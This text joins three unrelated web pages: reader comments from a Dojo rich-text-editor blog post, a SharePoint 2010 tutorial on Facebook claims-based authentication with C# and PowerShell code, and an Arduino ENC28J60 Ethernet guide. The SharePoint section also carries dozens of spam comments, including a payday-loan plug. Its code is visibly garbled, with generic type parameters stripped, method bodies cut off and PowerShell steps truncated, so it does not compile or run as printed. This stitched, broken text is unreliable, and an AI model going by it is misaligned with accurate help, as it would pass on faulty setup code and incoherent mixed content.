Dojo Well we still believe that if there is a question, the FAQ should be the first place you look. I think people ingeneral forget the purpose of them these days. They are (and this is my opinion on FAQs) there to serve as a buffer against repeatedly hearing/answering the same questions. As for better more... intuitive documentation, we have a front-end in the process to aide in building the API's and allowing for cleaner more complete documenation. Now, on to the unanswered portion of your reply, regarding setModulePrefix, I did a grep on dojo/src, and every function I see of dojo.setModulePrefix() has the exact same design as the API documenation you referenced from the manual. I think where the problem comes in is the names used for the arguments to the function. Which I fixed as of this reply. In the manual link that you posted, the API calls the 2 variables, "modulePrefix" and "prefix". However, the src code uses "module" and "prefix" respectively the same arguments, just slightly different name on the first one. I can see how this is confusing since the API oringally used "prefix" in both arguments. How the documentation is written "module" (formerly "modulePrefix" before being corrected to mirror the src code) is used to define the root directory of a developers own javascript module, and "prefix" is used to define the new namespace. As for your speed response, someone just happened to see this and tell me about it ;) You got lucky hehe. And just to give you some more food for thought. There is actually a wikiBook being worked on by myself and 1 other person that I'm aware of, that is meant to explain the basics of Dojo's features. However, instead of explaining the code behind a certain method (like programatic widget creation), we are focusing on the why you might choose to do it that way verus the parsed markup route and vice versa. Well, almost midnight and I still have a bit to do before bed. I hope this clears up your problem even further. It honestly looks like a misunderstanding from looking at the same code for too long ;) Good night, -Karl You should check out TinyMCE as well.. That problem has been hit by others, simply need to know how to create the path structure. If they had any kind of decent documentation, you and others wouldn't have this problem. If you look at their mailing list, people have been pleading with them for a long time for good documentation and tutorials. They resist doing this and can't get it through their head that their project will not get many users without it. Observation +2.5 months. I'm using FCKEditor at the present, but I'm still not entirely satisfied with the decision. FCKEditor requires a huge number of files, and I'm reconsidering Dojo. Dojo seems a cleaner soution than FCKEditor, and I'm having problems getting a FCKEditor to reload in a replaceable DIV. Hi, I had a hard time getting dojo o work, FCK was much easier. However I would like to use dojo editor because of its sleek look so any ideas on how to get it to work would be apperciated. I second iampivot. I would never touch neither one of your candidates since I tried TinyMCE. I have been looking into DOJO for the last 3 days and it seems really good, but I still havent looking into integrating DOJO with a back end server stuff. Thanks for this article it was good ..I just happend to read it. Just my two cents. I integrated dojo 0.4.1 into my springmvc backed application. The document wasn't much of help, but I manage to get the editor working by looking at their example and code, and added: var djConfig = { baseScriptUri: "", isDebug: false }; before anything. and it works. However, when I use the dialog widget to collect more adhoc info from the form. Very weird thing happened, and I still haven't got the chance to figure out why yet. Whatever I input in the dialog form element are not been submitted to the httpservletrequest object in my controller. And I am pretty sure this is dojo issue, because when i removed the widget, everything works fine. Anyway, I am moving to use fck for now, because of the internalization feature. TinyMce is great too. Thank you for this article. One thing i'm noticing is that "Karl's" post is not appearing (along with several after his) - the one with the explanation of the misunderstanding/fix to your article above. I just happened to see it when i did a 'view source' on this page because the comment starting with "regarding dojo" seemed to be missing some sentences (that i thought might have been code that didn't render properly). Thought you'd might want to get that fixed :) Thank you for point that out. I pasted part of the javascript code in there and that doesn't seem to be rendered properly. But a view source on page will do it. alert("It is not secure ...");
http://www.oreillynet.com/onjava/blog/2006/02/integrating_a_richtext_widget.html
crawl-002
refinedweb
2,677
63.09
I got a task to configure Facebook Authentication couple of days back. I explored couple of blogs like PointBridge and Osnapz , they are good blog posts it give you an idea how to do that but overall i didn’t find anything like a step by step guide for those users who are doing it first time. Also when i started configuring Facebook Authentication i came across several issues which serves a lot of time and eventually my whole day was spent doing that. Therefore, i thought to make a blog entry which provides Step to Step guide for configuring Facebook Authentication in SharePoint 2010. Following are the steps to configure Facebook Authentication for SharePoint sites. Step 1: Download and Install Components - Download and Install Windows Identity Framework SDK from - Download Json.Net from Step 2: Create a new ASP.Net website - Open Visual Studio and click on File> New Website - Specify Website Name and path to the folder where you want to store the website and click on OK - It will create a new Website. - Now associate a certificate with this Website and enable SSL. - Open IIS Manager by typing inetmgr from the run option in windows OS. - Open Server Certificates and click on Create Self-Signed Certificate. - Specify certificate friendly name, click OK. - Certificate will be created. Now associate this certificate to your Website - Right click on the Server in IIS and click on Add Website. Specify Site Name and Physical Path, Select Port and click on Ok. Your website will be hosted on IIS. - Select Website and click on Bindings from the left Panel. - Click on Add and select the type ‘Https’ and specify any port by default it uses 443 but you can assign any other port as well. Select certificate you just created and click OK. - Now the server certificate has been associated with your website. - Export this certificate and save it somewhere in your system. We need this when running power shell scripts. - Now Open Visual Studio and change the Sever settings in the Property Pages of the website. - Right click on your website and click on Property Pages - Go to the Startup Options and select Use custom server option and specify the Website URL that is hosted on IIS (Use SSL one). - Now navigate to your website and test it should be in working state and there should not be any issue. Step 3: Create an STS Site from ASP.Net website - Go to the Visual Studio and right click on the Website project and click on Add STS Reference - It will pop up a Wizard window just click Next. - In the next window select “Create a New STS Project in the current Solution”. - Click on Finish. - You will notice a new Website will be added in the solution. - Now Open the IIS Manager and change the physical path to the newly STS website. - Just click on Website in the IIS Manager - Click on Basic Settings from the Right Panel in IIS Manager - Specify new path and click OK. - Now Test your STS website it should run without any issue. Step 4: Create Application in Facebook - Navigate to - Create new Application using Create New Application option - Provide name - Click ok It will create a new application - Now Click on Edit Setting and Specify your ASP.Net site URL. We need to specify this so it will redirect it to the default.aspx after successful authentication. - Note Application Id and Secret Key that we will reference in the ASP.Net code. - Now we are ready to move next on Step 5. Step 5: Execute Scripts on Power Shell Open SharePoint 2010 Management Shell and execute following scripts in order. - $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2(“c:\yourexported_cert.cer”) - $map1 = New-SPClaimTypeMapping “” -IncomingClaimTypeDisplayName “FacebookID” –SameAsIncoming - $map2 = New-SPClaimTypeMapping -IncomingClaimType “” -IncomingClaimTypeDisplayName “Display Name” -LocalClaimType - $realm = “urn:researchfacebook.com:facebook” (Specify any urn but note it) - Step 6: Modify Code and Edit Configuration file 1. Create a new oAuthFacebook.cs class and add it in the App_Code folder in the Website project. Following is a code of oAuthFacebook.cs. Change the Yellow highlighted part according to your application. using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Net; using System.Collections.Specialized; using System.IO; /// /// public class oAuthFacebook { public enum Method { GET, POST }; public const string AUTHORIZE = “”; public const string ACCESS_TOKEN = “”; public const string CALLBACK_URL = “”; private string _consumerKey = “”; private string _consumerSecret = “”; private string _token = “”; #region Properties public string ConsumerKey { get { if (_consumerKey.Length == 0) { //Your application ID _consumerKey = “000000000000000”; } return _consumerKey; } set { _consumerKey = value; } } public string ConsumerSecret { get { if (_consumerSecret.Length == 0) { //Your application secret key _consumerSecret = “00000000000000000000000000000000”; } return _consumerSecret; } set { _consumerSecret = value; } } public string Token { get { return _token; } set { _token = value; } } #endregion /// /// /// The url with a valid request token, or a null string. public string AuthorizationLinkGet() { return string.Format(“{0}?client_id={1}&redirect_uri={2}”, AUTHORIZE, this.ConsumerKey, CALLBACK_URL); } /// /// /// The oauth_token or “code” is supplied by Facebook’s authorization page following the callback. public void AccessTokenGet(string authToken) { this.Token = authToken; string accessTokenUrl = string.Format(“{0}?client_id={1}&redirect_uri={2}&client_secret={3}&code={4}”, ACCESS_TOKEN, this.ConsumerKey, CALLBACK_URL, this.ConsumerSecret, authToken); string response = WebRequest(Method.GET, accessTokenUrl, String.Empty); if (response.Length > 0) { //Store the returned access_token NameValueCollection qs = HttpUtility.ParseQueryString(response); if (qs[“access_token”] != null) { this.Token = qs[“access_token”]; } } } /// /// /// Http Method /// Full url to the web resource /// Data to post in querystring format /// The web server response. public string WebRequest(Method method, string url, string postData) { HttpWebRequest webRequest = null; StreamWriter requestWriter = null; string responseData = “”; webRequest = System.Net.WebRequest.Create(url) as HttpWebRequest; webRequest.Method = method.ToString(); webRequest.ServicePoint.Expect100Continue = false; webRequest.UserAgent = “[You user agent]”; webRequest.Timeout = 20000; if (method == Method.POST) { webRequest.ContentType = “application/x-www-form-urlencoded”; //POST the data. requestWriter = new StreamWriter(webRequest.GetRequestStream()); try { requestWriter.Write(postData); } catch { throw; } finally { requestWriter.Close(); requestWriter = null; } } responseData = WebResponseGet(webRequest); webRequest = null; return responseData; } /// /// /// The request object. /// The response data. public string WebResponseGet(HttpWebRequest webRequest) { StreamReader responseReader = null; string responseData = “”; try { responseReader = new StreamReader(webRequest.GetResponse().GetResponseStream()); responseData = responseReader.ReadToEnd(); } catch { throw; } finally { webRequest.GetResponse().GetResponseStream().Close(); responseReader.Close(); responseReader = null; } return responseData; } } 2. In this step we will replace the existing logic in the Login.aspx for Facebook Authentication 3. Open Login.aspx and replace with following code. using System; using System.Web.Security; using System.Web; using System.Collections.Generic; using Newtonsoft.Json; using Newtonsoft.Json.Linq; public partial class Login : System.Web.UI.Page { protected void Page_Load( object sender, EventArgs e ) { string url = string.Empty; oAuthFacebook fbAuth = new oAuthFacebook(); if (Request[“code”] == null) { // Response.Redirect(“”); claims = GetClaims(json); HttpContext.Current.Session.Add(“AuthClaims”, claims); FormsAuthentication.SetAuthCookie(“Facebook Test”, false); Response.Redirect(“default.aspx?” + HttpContext.Current.Session[“OriginalQueryString”]); } } } private Dictionary GetClaims(string json) { Dictionary claims = new Dictionary();; } } 4. In the CertificateUtil.cs I have changed the logic from comparing Subject Name with Friendly Name of the certificate. This is done because I have multiple self- signed certificates installed on my server and all having a same subject name i.e. machine name. So the only unique name I found was Friendly Name, that’s why I have changed it to Friendly Name..FriendlyName.ToLower() == subjectName.ToLower() ) { if ( result != null ) { throw new ApplicationException( string.Format( "There are multiple certificates(); } } } 5. GetScope Method of CustomTokenSecurityService.cs looks like following protected override Scope GetScope( IClaimsPrincipal principal, RequestSecurityToken request ) { // ValidateAppliesTo( request.AppliesTo ); // // Note: The signing certificate used by default has a Distinguished name of "CN=STSTestCert", // and is located in the Personal certificate store of the Local Computer. Before going into production, // ensure that you change this certificate to a valid CA-issued certificate as appropriate. // Scope scope = new Scope( request.AppliesTo.Uri.OriginalString, SecurityTokenServiceConfiguration.SigningCredentials ); scope.TokenEncryptionRequired = false; //Specify the Realm name as defined in the script in PowerShell. if (scope.AppliesToAddress == "urn:fbauth.com:facebook") { //Specify the Web Application URL which has claim based authentication as Facebook as a Trusted provider. scope.ReplyToAddress = ""; } else { scope.ReplyToAddress = scope.AppliesToAddress; } return scope; } 6. In the Web.config file update the SigningCertificateName Step 7: Create a New Web Application in SharePoint 2010 - Open Central Administration - Click on Manage Web Applications - Select New Web Application option from the Ribbon bar. - In the New Web Application window select Claim Based as Authentication mode. - Select Facebook as Trusted Identity Provider - Click OK - Now Once the Web Application is created we need to create a Site collection. - Click on Create Site Collections under Site Collections - Make sure your newly created Web Application is selected for which you are creating a site collection. - Specify Title and select any template, In the Primary Site Collection Administrator select Browse people/group button. - Select People window opens and there you will see Facebook in the left pane - Now select Facebook and click on the search icon button to search. You will see one Facebook user will populate in the main pane. - Select and click ok - We are done now we will navigate to our Web Application and login with Facebook account. [Hint] Step 8: Navigating to SharePoint 2010 Site - Navigate to your SharePoint site. It will show you the option to select Authentication type as Facebook and Windows Authentication. - Just Select Facebook. - As the certificate I have used is self- signed that’s why It will show some warning as below. Just click on Continue to the website and proceed. - It will show the Facebook login page. Enter your user name and password and click on Sign In. - It will show the Main SharePoint site Home page. Note: One thing you want to do here is when you will login to your account first time with your Facebook Id you will be prompted Access Denied in SharePoint site and it will give show you the numeric ID of your Facebook Account that this does not have an access to your site. Just copy that ID and place it in any of the SharePoint User Groups of your Site Collection or even specify it as a Primary or Secondary Administrator just to test. Then now when you re login, it will show the main SharePoint site page. Thanks $author| you share some great -2 tactics, Thanks For Sharing all this and making it clear enough for any one to be able to grasp! I’ve Subscribed to your rss feed to Keep up to date, looking forword to your new posts! Regards for all your efforts that you have put in this. Very interesting information. “Every man is the architect of his own fortune.” by Appius Claudius. Simply a smiling visitant here to share the love (:, btw great design . I think this site has some very good info for everyone :D. “When you get a thing the way you want it, leave it alone.” by Sir Winston Leonard Spenser Churchill. I visited a lot of website but I believe this one contains something extra in it. “A bore is a man who, when you ask him how he is, tells you.” by Bert Leston Taylor. I am now not sure where you are getting your information, however good topic. I needs to spend a while learning much more or figuring out more. Thanks for great information I was looking for this information for my mission. Hello are using WordPress for your blog platform? I’m new to the blog world but I’m trying to get started and set up my own. Do you need any html coding expertise to make your own blog? Any help would be greatly appreciated! Good post. I learn something more challenging and difficult on many blogs every single day. Most commonly it is stimulative to read content from different writers and practice a specific thing from their website. I’d prefer to use some articles on my blog if you don’t mind. Normally I’ll provide you a link . Thanks for sharing with us. Thanks for your genuine and appealing content. Real nice design and wonderful content , practically nothing else we want : D. Generally I don’t read article on blogs, however I wish to say that this write-up very compelled me to take a look at and do it! Your writing taste has been amazed me. Thanks, quite nice article. I was just searching. Only wanna remark on few general things, The website style is perfect, the subject matter is rattling good : D. Thank you for any other wonderful post. The place else may just anybody get that type of information in such an ideal method of writing? I have a presentation subsequent week, and I am at the look for such info. Its fantastic as your other articles : D, appreciate it for posting . “Reason is the substance of the universe. The design of the world is absolutely rational.” by Georg Wilhelm Friedrich Hegel. I think other website proprietors should take this site as an model, very clean and excellent user genial style and design, let alone the content. You’re an expert in this topic! Great post, I believe website owners should learn a lot from this weblog its real user friendly. So much superb information on here :D. Very interesting topic , thanks for putting up. “The season of failure is the best time for sowing the seeds of success.” by Paramahansa Yogananda. You are my breathing in, I own few blogs and very sporadically run out from brand :). “‘Tis the most tender part of love, each other to forgive.” by John Sheffield. Some genuinely tremendous work on behalf of the owner of this website , utterly great subject material . Thanks, I have just been searching for information approximately this subject for ages and yours is the best I’ve came upon so far. But, what concerning the bottom line? Are you positive concerning the supply? Wohh just what I was looking for, thanks for putting up. Dead pent subject material, thank you for entropy. “He who establishes his argument by noise and command shows that his reason is weak.” by Michel de Montaigne. Great write-up, I am regular visitor of one’s website, maintain up the excellent operate, and It is going to be a regular visitor for a lengthy time. Thanks for the auspicious writeup. It in fact was a amusement account it. Look complex to more brought agreeable from you! However, how could we communicate? Hey thanks for the appreciation, you can check my about us page for contacts. Wonderful site. Lots of helpful info here. I am sending it to several buddies ans also sharing in delicious. And obviously, thanks on your sweat! What’s Taking place i am new to this, I stumbled upon this I’ve found It absolutely useful and it has helped me out loads. I hope to give a contribution & help different users like its aided me. Great job. I truly appreciate this post. I have been looking everywhere for this! Thank goodness I found it on Bing. You have made my day! Thx again! I was looking through some of your blog posts on this website and I conceive this site is really informative! Keep putting up. Wow! This could be one particular of the most helpful blogs We have ever arrive across on this subject. Basically Fantastic. I’m also a specialist in this topic therefore I can understand your effort. Just wanna comment on few general things, The website pattern is perfect, the subject matter is real superb : D. Personally, I have located that to remain probably the most fascinating topics when it draws a parallel to. Many thanks Appreciate it for helping out, fantastic information. I am not real good with English but I come up this really easy to understand. Thanks for the auspicious writeup. It in reality used to be a enjoyment account it. Look complex to more brought agreeable from you! However, how can we keep in touch? Wohh just what I was looking for, thank you for posting. Real wonderful information can be found on site . “Time discovers truth.” by Lucius Annaeus Seneca. I just couldn’t depart your website prior to suggesting that I extremely loved the usual info a person provide to your guests? Is going to be back incessantly in order to investigate cross-check new posts. I was studying some of your content on this website and I think this web site is real instructive! Keep on putting up. Pretty section of content. I just stumbled upon your site and in accession capital to assert that I get in fact enjoyed account your blog posts. Any way I will be subscribing to your feeds and even I achievement you access consistently quickly. I reckon something really interesting about your web site so I saved to favorites . hey guys!! Amazing site! Much appreciation for this blog. You constantly publish a absorbing article. I will come again in future. Simply wanna tell that this is very useful , Thanks for taking your time to write this. “A sailor without a destination cannot hope for a favorable wind.” by Leon Tec. Enjoyed reading through this, very good stuff, regards . The more often I visit this blog the more I’m interested I’ve recently started a blog, and the information you offer on this website has helped me greatly. Thank you for all of your time & work. >Wonderful publish, Im attempting to get as much info as possible at the moment for my final undertaking to make certain I get the best final results attainable, so hold it coming You are my intake , I have few web logs and very sporadically run out from to brand. bookmarked!!, I love your web site! Hello! I’ve been reading your web site for a long time now and finally got the bravery to go ahead and give you a shout out from Huffman Tx! Just wanted to tell you keep up the good job!! Thank you, I’ve recently been searching for info about this subject for ages and yours is the best I have discovered so far. But, what about the conclusion? Are you sure about the source? I have recently started a site, and the information you offer on this website has helped me tremendously. Thanx for all of your time & work. As soon as I detected this website I went on reddit to share some of the love with! This blog looks exactly like my old one! It’s on a completely different topic but it has pretty much the same page layout and design. Superb choice of colors! Hmm is anyone else encountering problems with the pictures on this blog loading? I’m trying to determine if its a problem on my end or if it’s the blog. Any feedback would be greatly appreciated. I truly appreciate this post. I have been looking all over for this! Thank goodness I found it on Bing. You have made my day! Thx again! I conceive you have noted some very interesting points , regards for the post. Howdy! Someone in my Myspace group shared this site with us so I came to take a look. I’m definitely loving the information. I’m bookmarking and will be tweeting this to my followers! Great blog and fantastic design and style. You have noted very interesting details ! ps decent website . “Ask me no questions, and I’ll tell you no fibs.” by Oliver Goldsmith. Hello there, I found your blog by way of Google whilst looking for a comparable subject, your web site came up, it looks good. I have bookmarked it in my google bookmarks.! Keep up the wonderful work, I read few posts on this site and I think that your blog is real interesting and contains circles of great information. Great post. I just stumbled upon your blog and wanted to say that I have really enjoyed browsing your blog posts. In any case I’ll be subscribing to your feed and I hope you write again soon! I am not rattling wonderful with English but I come up this really leisurely to understand. What i don’t understood is if truth be told how you are no longer really a lot more neatly-appreciated than you may be now. You are very intelligent. You realize therefore considerably relating to this topic, made me for my part believe it from a lot of numerous angles. Its like men and women are not involved unless it’s one thing to accomplish with Woman gaga! Your own stuffs excellent. Always care for it up! Very fantastic info can be found on blog. I’ve never thought that any blog would catch my attention so easily Exceptional superb work, I read few articles on this web site and I believe that your website is really interesting and has got circles of fantastic info.. Very interesting info!Perfect just what I was searching for! Very interesting details you have observed, thanks for putting up. I believe this website has very excellent composed articles articles. You made some clear points there. I looked on the internet for the issue and found most guys will approve with your site. can see which you are putting a a lot of efforts into your blog. Preserve posting the good perform.Some really helpful information in there. Bookmarked. Wonderful to see your website. Thanks! Love it all. There is a good chance I’ll bookmark this page, but then again, I’m feeling a bit grumpy today, so may not. I’ll let you know. Attractive section of content. I just stumbled upon your site and in accession capital to assert that I get actually enjoyed account your blog posts. Anyway I will be subscribing to your feeds and even I achievement you access consistently quickly. I’ve recently started a web site, the information you offer on this site has helped me tremendously. Thank you for all of your time & work.. very nice put up, i actually love this web site, carry on it I really appreciate your piece of work, Great post. I like this site very much so much wonderful information. It’s very helpful and encouraging, and i want to bookmark this webpage to be certain that potential customers is originating from your aspect and even more folks check out your blog.Maintain posting far more. I loved as much as you’ll receive carried out proper here. The comic strip is tasteful, your authored material stylish. nevertheless, you command get bought an shakiness over that you wish be handing over the following. ill indisputably come further before again since precisely the same nearly very ceaselessly inside case you shield this increase. I like this post, enjoyed this one regards for putting up. I am not real wonderful with English but I line up this really leisurely to translate. Very interesting topic, appreciate it for putting up. Very nice post. I just stumbled upon your blog and wished to say that I’ve really enjoyed surfing around your blog posts. In any case I’ll be subscribing to your rss feed and I hope you write again very soon! I like this web site very much so much fantastic information. Rattling nice layout and fantastic content, nothing else we require :D. You completed a number of good points there. I did a search on the issue and found most people will consent with your blog. I believe this website has some rattling wonderful information for everyone :D. “America is not merely a nation but a nation of nations.” by Lyndon B. Johnson. Very nice publish, i certainly love this web site, keep goods from you, man. I have understand your stuff previous to and you’re just extremely excellent. I really a lot for sharing this with all of us you actually understand what you are speaking approximately! Bookmarked. Kindly additionally visit my website =). We may have a link change contract between us! Fine Adept, what an exciting narrative. Easily hada blog We’d essentially blog about very much the same factors. Should you prefer a payday loan kindly visit When I originally commented I clicked the -Notify me when new comments are added- checkbox and now each time a comment is added I get four emails with the same comment. Is there any way you can remove me from that service? Thanks! Hiya! Fantastic blog! I happen to be a daily visitor to your site (somewhat more like addict 😛 ) of this website. Just wanted to say I appreciate your blogs and am looking forward for more to. Very interesting subject, thanks for posting. Whats up! I simply would like to give a huge thumbs up for the good information you have here on this post. I will be coming back to your blog for extra soon. Hiya! Fantastic blog! I happen to be a daily visitor to your site (somewhat more like addict 😛 ) of this website. Just wanted to say I appreciate your blogs and am looking forward for more to come! I do not even know how I ended up here, but I thought this post was great. I don’t know who you are but certainly you’re going to a famous blogger if you aren’t already 😉 Cheers! Excellent read, I just passed this onto a friend who was doing some research on that. And he actually bought me lunch because I found it for him smile So let me rephrase that: Thanks for lunch! “We have two ears and one mouth so that we can listen twice as much as we speak.” by Epictetus. Utterly composed content material , thankyou for information . We wish to thank you yet again for the wonderful ideas you offered Jeremy when preparing a post-graduate research plus, most importantly, with regard to providing each of the ideas in a blog post. If we had been aware of your web page a year ago, we’d have been saved the unwanted measures we were choosing. Thank you very much. Thank you for the write up! Also, just a heads up, your RSS feeds aren’t working. Could you take a look at that? I wanted to develop a small note to say thanks to you for all of the fabulous guidelines you are giving at this website. My time intensive internet look up has at the end been recognized with extremely good tips to talk about with my two friends. I ‘d claim that many of us site visitors are truly blessed to exist in a notable place with many lovely individuals with very helpful guidelines. I feel extremely grateful to have come across your website page and look forward to really more fun minutes reading here. Thank you once more for a lot of things. I together with my guys were viewing the good advice from the blog and so then got a terrible suspicion I never expressed respect to the website owner for those techniques. Those women came as a result warmed to read them and have clearly been loving them. I appreciate you for turning out to be indeed thoughtful as well as for considering this form of useful issues most people are really needing to understand about. My sincere regret for not expressing gratitude to sooner. impressive coding… Great works Do we need to add provider for Facebook in web.config of the webapplication , so that Facebook users apper in People picker?? I tried the same steps mentioned here but Facebook is not coming in the people picker. Actually we cannot add facebook ids directly to sharepoint user groups to whom we want to give an access. Each facebook id have a numeric id in behind please see the “Note” section at the bottom of the blog to the problem i faced and then resolved. You can add that “numeric” id in the user group of sharepoint for permissions and access rights. Exactly that’s what the problem is, My people picker is not picking up the Facebook Id’s. How do we configure the people picker to get the facebook users? Hmmm… Good question but as I got the other way around as mentioned in the post I didn’t look into it. Great work, Ovais. I tried following the steps but got stuck at creation of STS reference, because I kept getting “File not found exception (0x80070002). Any advise will be greatly appreciated. I am running on Windows Server 2008 R2. Thanks. Raj I know this web page provides quality dependent content and other stuff, is there any other website which provides these stuff in quality? Great Article……..i follow those Step but i am stuck at one point, when we create website in IIS it cannot be browse or it give me error. What error can you please share its detail Hi, This is a really nice post. it helps me to create an web application with trusted FB. But i am facing some difficulties. I am using ‘SharePoint 2010 Foundation’. In IIS I have created website “”, and in my ASP .net code i have created STS website i make this as start up project when i run the site it gives me an address like “” and directly redirect to FB login page. so at the time of power-shell command i used and run the all commands. i have created web application from central admin and also Selects Facebook as Trusted Identity Provider. But at the time creating ‘site collection’ i cannot able to find the ‘Primary Site Collection Administrator’ of “Facebook”. See when you login first time with your Facebook id it will give you some error message followed to some numeric id. So, then just logic with Windows Authentication and add that Id as secondary site collection or primary site collection Administrator. By default the access is denied. Once done, login again with your facebook id and you will pass through the authentication. Now i am created site collection with primary site collection Administrator as “admin”, but when i choose login with Facebook it will redirect me on FB’s login page which we want. but after login it will not showing me any error message. i will directly jump to my Facebook account. Hey, I found Error in Default.aspx page Error : The action ” (Request.QueryString[‘wa’]) is unexpected. Expected actions are: ‘wsignin1.0’ or ‘wsignout1.0’. In the following line of code. : WSFederationConstants.Actions.SignOut ) ); } } catch ( Exception exception ) can you please help me to solve this. You might be doing something wrong.. please go through to the article carefully… many guys have successfully implemented following this article without getting any such error. I can help you out but please go through the article once again… Hi, What you think about these product? When I changed phyhsical path to STS-website’s path and clicked on the test connection, I received a warning message saying; “Cannot verify access to path”.How can I solve this? Hi, in Step 3: Create an STS Site from ASP.Net website, when I click “Finish” I get an exception saying: The system cannot find the file specified. (Exception from HRESULT: 0x80070002. I don’t know what I could do to fix the problem Can you please give us an update? I every time spent my half an hour to read this web site’s posts every day along with a mug of coffee. You’ve made various nice points here. I see something actually special in this site. Thanks for posting. Thanks for the walk-through. I have no problem with the ASP.net site with sts and integrated with facebook. But when I have confiugred the facebook authentication for sharepoint i am receiving an error stating .” Can you please tell if there are some settings I have to do on sharepoint to resolve this error. Was this resolved for you sri.. I am in the same pool as you .. No!!! I was unable to find any solution for this issue. Please check the article again maybe you have missed some step. I didnt face any such error before. I have read so many articles or reviews on the topic of the blogger lovers except this article is actually a nice piece of writing, keep it up. Amazing post thank you! We think your content articles are excellent as well as hope there will be more soon. What’s up to all, the contents present at this website are really remarkable for people knowledge, well, keep up the nice work fellows. Appreciating the time and energy you put into your site and detailed information you offer. It’s great to come across a blog every once in a while that isn’t the same out of date rehashed information. Fantastic read! I’ve saved your site and I’mincluding your RSS feweds too my Googlpe account. its not working, its giving error “Keyset does not exist” its give 500 internal server error Please check where your website is hosted and provide the same URL that should be accessible. This is something related to the site hosting issues.
https://ovaismehboob.com/2011/09/07/configuring-facebook-authentication-in-sharepoint-2010/?replytocom=50086
CC-MAIN-2020-16
refinedweb
5,516
67.45
Add Ethernet to Any Arduino Project for Less Than 10$ 303,583 404 62 So you have a neat Arduino project going on. Wouldn't it be nice to add Internet connectivity and do it on the cheap as well? This Instructable will show you how to add Internet connectivity in the form of an Ethernet interface for a few dollars and in less than half an hour. More info at: Teacher Notes Teachers! Did you use this instructable in your classroom? Add a Teacher Note to share how you incorporated it into your lesson. Step 1: Order an ENC28j60 Ethernet Module on EBay Apart from your Arduino, you need a read-made Ethernet module. You can easily get these on eBay for as low as 10$. Just search eBay for ENC28J60 module. In addition, you need to have a bit of electrical wire, a soldering iron and some soldering 'tin'. Step 2: Wire Up the Ethernet Module Now it's time to wire up the module. Either use a connector to put on the Ethernet module header or solder straight onto the pins (like I did). You will need just six wires, I used about 3-4 inches length, but this is not critical (as long as it's not a foot long).. Step 3: Arduino Code Last step is to upload Arduino code to connect to the Internet. For the ENC28J60 chip/module, there are two Arduino libraries available: Ethershield (development has stopped) and Ethercard (the newest). Load a Sketch that let's the Arduino act as a webserver, like this example: // This is a demo of the RBBB running as webserver with the Ether Card // 2010-05-28 <jc@wippler.nl> #include <EtherCard.h> // ethernet interface mac address, must be unique on the LAN static byte mymac[] = { 0x74,0x69,0x69,0x2D,0x30,0x31 }; static byte myip[] = { 192,168,1,203 }; byte Ethernet::buffer[500]; BufferFiller bfill; void setup () { if (ether.begin(sizeof Ethernet::buffer, mymac) == 0) Serial.println( "Failed to access Ethernet controller"); ether.staticSetup(myip); } static word homePage() { long t = millis() / 1000; word h = t / 3600; byte m = (t / 60) % 60; byte s = t % 60; bfill = ether.tcpOffset(); bfill.emit_p(PSTR( "HTTP/1.0 200 OK\r\n" "Content-Type: text/html\r\n" "Pragma: no-cache\r\n" "\r\n" "<meta http-" "<title>RBBB server</title>" "<h1>$D$D:$D$D:$D$D</h1>"), h/10, h%10, m/10, m%10, s/10, s%10); return bfill.position(); } void loop () { word len = ether.packetReceive(); word pos = ether.packetLoop(len); if (pos) // check if valid tcp data is received ether.httpServerReply(homePage()); // send web page data } With a bit of hacking, you can easily add code to display analog values read off the analog pins for instance. Step 4: Done!!! That's it, you just hooked up your Arduino to the Internet for less than 10$. More interesting Arduino stuff at: demonspells made it! 62 Discussions 1 year ago Hello how are you I want to cut the network cable halfway down and connect it wirelessly My question is, it did this with this module If you have an experience with your friend. This module can read the pins + rx, -rx, + tx, and -tx of the network port. 6 years ago on Introduction I was expecting to see a level converter between the 5v arduino and 3v Ethernet enc28 board on the data lines. I've seen other DIY arduino Ethernet boards that use it. But yours indicates that is not necessary? Thanks. Reply 1 year ago The vital pins are 5V tolerant, according to the datasheet. SI is 3V3, which is recognised by 5V inputs. 2 years ago The CS pin can be made to be 8 if you wish: ether.begin(sizeof Ethernet::buffer, mymac, 8) is all that is required. Great tutorial tho.. 2 years ago Hi All! New UIPEthernet release is available (2.0.3). Added support for Intel ARC32, Nordic nRF51, and Teensy boards. The Errata#12 corrected. The Issues corrected. You can download from: and from: Best Regards 2 years ago Hi All! You can use UIPEthernet library for ENC28j60 arduinos (AVR,STM32F,ESP8266). You can download this library from: Best Regards Reply 2 years ago Hi All! Direct link to full repository compressed ZIP file:... Best regards Reply 2 years ago Hi All! New version available:1.2.1 - Added Abstract Print class to MBED for full compatibility (Can use print, println with uip objects.) - All examples working properly with MBED compiler. Best regards 2 years ago Nice tutorial. Thanks, and for those with problems. ANSWER TO PROBLEM: (Sep 2016) Pin 10 for CS, NOT pin 8. Reply 2 years ago Thanks changing from pin 8 to 10 sorted out my issue... cheers! 3 years ago Since the ethernet module itself has some programmability I can see it being an invaluable tool for a network technician... Maybe someone could write a snippet of code to blink the LEDs on a network switch in a user defined pattern (just in case several were in use at once)... a pattern different than normal network traffic (maybe blink the 10-100 LED)... then the tech could plug this into a network wall jack and then find the blinking switch port... power it with three AA cells... Picture a building with 4 jacks per cubicle, 400 cubicles per floor, and 18 floors... now find the switch port for jack #3 in cubicle 307 on the 11th floor.... Yes, a consistent wiring pattern can find the patch panel, but then there is the tangle of patch cords. I'd pay $50 for this in a heartbeat! 3 years ago Somebody knows how to fix those errors while compiling?: "...Arduino\libraries\ethercard-master\EtherCard.h:252:41: warning: 'prog_char' is deprecated [-Wdeprecated-declarations] void emit_raw_p (PGM_P p, uint16_t n) { memcpy_P(ptr, p, n); ptr += n; } ^" I get lots of those. Same thing when trying to use UIPEthernet 3 years ago I am using UIPEthernet library, connection is same except using arduino pin 10 instead of 8. 3 years ago Not working for me, I guess wiring is correct because it works with Ethercard library. The flashlight is blinking, but I cannot ping it. Any idea ? Reply 3 years ago Which library are you using then? Ethercard is the only use that uses pin 8 (for CS). If you're using Ethernet or UIPEthernet you will need to move it to pin 10. 3 years ago on Introduction 4 years ago on Step 4 Can this be used as a replacement of the Ethernet Shield? Reply 4 years ago on Step 4 Yes indeed. Reply 3 years ago Could I connect with just 4 wires?? (I mean, I have a USB Ethernet adapter... Is it possible to use for this?) Reply 4 years ago on Step 4 Thank you, you just helped me solve something.
https://www.instructables.com/id/Add-Ethernet-to-any-Arduino-project-for-less-than-/
CC-MAIN-2019-35
refinedweb
1,150
74.79
